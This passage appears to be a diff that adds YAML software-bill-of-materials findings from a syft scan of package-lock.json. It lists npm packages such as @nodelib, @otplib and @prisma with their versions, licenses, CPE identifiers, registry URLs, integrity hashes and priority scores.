cpe:2.3:a:\@nodelib\/fs.scandir:\@nodelib\/fs.scandir:2.1.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40nodelib/fs.scandir@2.1.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz + integrity: sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g== + dependencies: + '@nodelib/fs.stat': 2.0.5 + run-parallel: ^1.1.9 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 562130ed42946717 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @nodelib/fs.stat 2.0.5' + title: '@nodelib/fs.stat 2.0.5' + description: 'Package discovered: @nodelib/fs.stat 2.0.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e6979906f7b5cde7 + name: '@nodelib/fs.stat' + version: 2.0.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@nodelib\/fs.stat:\@nodelib\/fs.stat:2.0.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40nodelib/fs.stat@2.0.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz + integrity: sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e2cebc90e3a6fa01 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @nodelib/fs.walk 1.2.8' + title: '@nodelib/fs.walk 1.2.8' + description: 'Package discovered: @nodelib/fs.walk 1.2.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e11d2a355e0d2438 + name: '@nodelib/fs.walk' + version: 1.2.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@nodelib\/fs.walk:\@nodelib\/fs.walk:1.2.8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40nodelib/fs.walk@1.2.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz + integrity: sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg== + dependencies: + '@nodelib/fs.scandir': 2.1.5 + fastq: ^1.6.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 371f10bc801b3e8a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @one-ini/wasm 0.1.1' + title: '@one-ini/wasm 0.1.1' + description: 'Package discovered: @one-ini/wasm 0.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8d849a9c4c0ebd39 + name: '@one-ini/wasm' + version: 0.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@one-ini\/wasm:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@one-ini\/wasm:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@one_ini\/wasm:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@one_ini\/wasm:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@one:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@one:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40one-ini/wasm@0.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@one-ini/wasm/-/wasm-0.1.1.tgz + integrity: sha512-XuySG1E38YScSJoMlqovLru4KTUNSjgVTIjyh7qMX6aNN5HY5Ct5LhRJdxO79JtTzKfzV/bnWpz+zquYrISsvw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3c1ae518b93a9e69 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @opentelemetry/api 1.9.1' + title: '@opentelemetry/api 1.9.1' + description: 'Package discovered: @opentelemetry/api 1.9.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 83e28d5e9e201d09 + name: '@opentelemetry/api' + version: 1.9.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@opentelemetry\/api:\@opentelemetry\/api:1.9.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40opentelemetry/api@1.9.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.1.tgz + integrity: sha512-gLyJlPHPZYdAk1JENA9LeHejZe1Ti77/pTeFm/nMXmQH/HFZlcS/O2XJB+L8fkbrNSqhdtlvjBVjxwUYanNH5Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f729f38c8f735bd2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @otplib/core 12.0.1' + title: '@otplib/core 12.0.1' + description: 'Package discovered: @otplib/core 12.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4401cb5cafc706d8 + name: '@otplib/core' + version: 12.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@otplib\/core:\@otplib\/core:12.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40otplib/core@12.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@otplib/core/-/core-12.0.1.tgz + integrity: sha512-4sGntwbA/AC+SbPhbsziRiD+jNDdIzsZ3JUyfZwjtKyc/wufl1pnSIaG4Uqx8ymPagujub0o92kgBnB89cuAMA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: aa5d016d75962c38 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @otplib/plugin-crypto 12.0.1' + title: '@otplib/plugin-crypto 12.0.1' + description: 'Package discovered: @otplib/plugin-crypto 12.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f17e31d5db2de66e + name: '@otplib/plugin-crypto' + version: 12.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@otplib\/plugin-crypto:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin-crypto:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin_crypto:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin_crypto:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40otplib/plugin-crypto@12.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@otplib/plugin-crypto/-/plugin-crypto-12.0.1.tgz + integrity: sha512-qPuhN3QrT7ZZLcLCyKOSNhuijUi9G5guMRVrxq63r9YNOxxQjPm59gVxLM+7xGnHnM6cimY57tuKsjK7y9LM1g== + dependencies: + '@otplib/core': ^12.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 58e5f41c022201bb + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @otplib/plugin-thirty-two 12.0.1' + title: '@otplib/plugin-thirty-two 12.0.1' + description: 'Package discovered: @otplib/plugin-thirty-two 12.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 104b985242c58dc2 + name: '@otplib/plugin-thirty-two' + version: 12.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@otplib\/plugin-thirty-two:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin-thirty-two:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin_thirty_two:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin_thirty_two:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin-thirty:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin-thirty:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin_thirty:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin_thirty:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/plugin:\@otplib\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40otplib/plugin-thirty-two@12.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@otplib/plugin-thirty-two/-/plugin-thirty-two-12.0.1.tgz + integrity: sha512-MtT+uqRso909UkbrrYpJ6XFjj9D+x2Py7KjTO9JDPhL0bJUYVu5kFP4TFZW4NFAywrAtFRxOVY261u0qwb93gA== + dependencies: + '@otplib/core': ^12.0.1 + thirty-two: ^1.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: de3f341e44725439 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @otplib/preset-default 12.0.1' + title: '@otplib/preset-default 12.0.1' + description: 'Package discovered: @otplib/preset-default 12.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 05997a7e636d9fd8 + name: '@otplib/preset-default' + version: 12.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@otplib\/preset-default:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/preset-default:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/preset_default:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/preset_default:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset-default:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset_default:12.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40otplib/preset-default@12.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@otplib/preset-default/-/preset-default-12.0.1.tgz + integrity: sha512-xf1v9oOJRyXfluBhMdpOkr+bsE+Irt+0D5uHtvg6x1eosfmHCsCC6ej/m7FXiWqdo0+ZUI6xSKDhJwc8yfiOPQ== + dependencies: + '@otplib/core': ^12.0.1 + '@otplib/plugin-crypto': ^12.0.1 + '@otplib/plugin-thirty-two': ^12.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 61834b2dc1830a08 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @otplib/preset-v11 12.0.1' + title: '@otplib/preset-v11 12.0.1' + description: 'Package discovered: @otplib/preset-v11 12.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 59bf565b491e939f + name: '@otplib/preset-v11' + version: 12.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@otplib\/preset-v11:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/preset-v11:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/preset_v11:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/preset_v11:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset-v11:12.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@otplib\/preset:\@otplib\/preset_v11:12.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40otplib/preset-v11@12.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@otplib/preset-v11/-/preset-v11-12.0.1.tgz + integrity: sha512-9hSetMI7ECqbFiKICrNa4w70deTUfArtwXykPUvSHWOdzOlfa9ajglu7mNCntlvxycTiOAXkQGwjQCzzDEMRMg== + dependencies: + '@otplib/core': ^12.0.1 + '@otplib/plugin-crypto': ^12.0.1 + '@otplib/plugin-thirty-two': ^12.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 242a3037b85d7c4e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @pkgjs/parseargs 0.11.0' + title: '@pkgjs/parseargs 0.11.0' + description: 'Package discovered: @pkgjs/parseargs 0.11.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 060c7b7a8f614664 + name: '@pkgjs/parseargs' + version: 0.11.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@pkgjs\/parseargs:\@pkgjs\/parseargs:0.11.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40pkgjs/parseargs@0.11.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz + integrity: sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 83a6bc7b54c525e8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @prisma/client 5.22.0' + title: '@prisma/client 5.22.0' + description: 'Package discovered: @prisma/client 5.22.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c440900ad881e975 + name: '@prisma/client' + version: 5.22.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@prisma\/client:\@prisma\/client:5.22.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40prisma/client@5.22.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@prisma/client/-/client-5.22.0.tgz + integrity: sha512-M0SVXfyHnQREBKxCgyo7sffrKttwE6R8PMq330MIUF0pTwjUhLbW84pFDlf06B27XyCR++VtjugEnIHdr07SVA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 888b8378fb32621d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @prisma/debug 5.22.0' + title: '@prisma/debug 5.22.0' + description: 'Package discovered: @prisma/debug 5.22.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9f4e1fa5bdb80e5a + name: '@prisma/debug' + version: 5.22.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@prisma\/debug:\@prisma\/debug:5.22.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40prisma/debug@5.22.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@prisma/debug/-/debug-5.22.0.tgz + integrity: sha512-AUt44v3YJeggO2ZU5BkXI7M4hu9BF2zzH2iF2V5pyXT/lRTyWiElZ7It+bRH1EshoMRxHgpYg4VB6rCM+mG5jQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1e736006ff85bb23 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @prisma/engines 5.22.0' + title: '@prisma/engines 5.22.0' + description: 'Package discovered: @prisma/engines 5.22.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0f98eed7c2a9484e + name: '@prisma/engines' + version: 5.22.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines:5.22.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40prisma/engines@5.22.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@prisma/engines/-/engines-5.22.0.tgz + integrity: sha512-UNjfslWhAt06kVL3CjkuYpHAWSO6L4kDCVPegV6itt7nD1kSJavd3vhgAEhjglLJJKEdJ7oIqDJ+yHk6qO8gPA== + dependencies: + '@prisma/debug': 5.22.0 + '@prisma/engines-version': 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2 + '@prisma/fetch-engine': 5.22.0 + '@prisma/get-platform': 5.22.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c3ee871894c65f6a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2' + title: '@prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2' + description: 'Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3a15a4d5b57a6a32 + name: '@prisma/engines-version' + version: 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@prisma\/engines-version:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/engines-version:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/engines_version:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/engines_version:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@prisma/engines-version/-/engines-version-5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2.tgz + integrity: sha512-2PTmxFR2yHW/eB3uqWtcgRcgAbG1rwG9ZriSvQw+nnb7c4uCr3RAcGMb6/zfE88SKlC1Nj2ziUvc96Z379mHgQ== + dependencies: null + 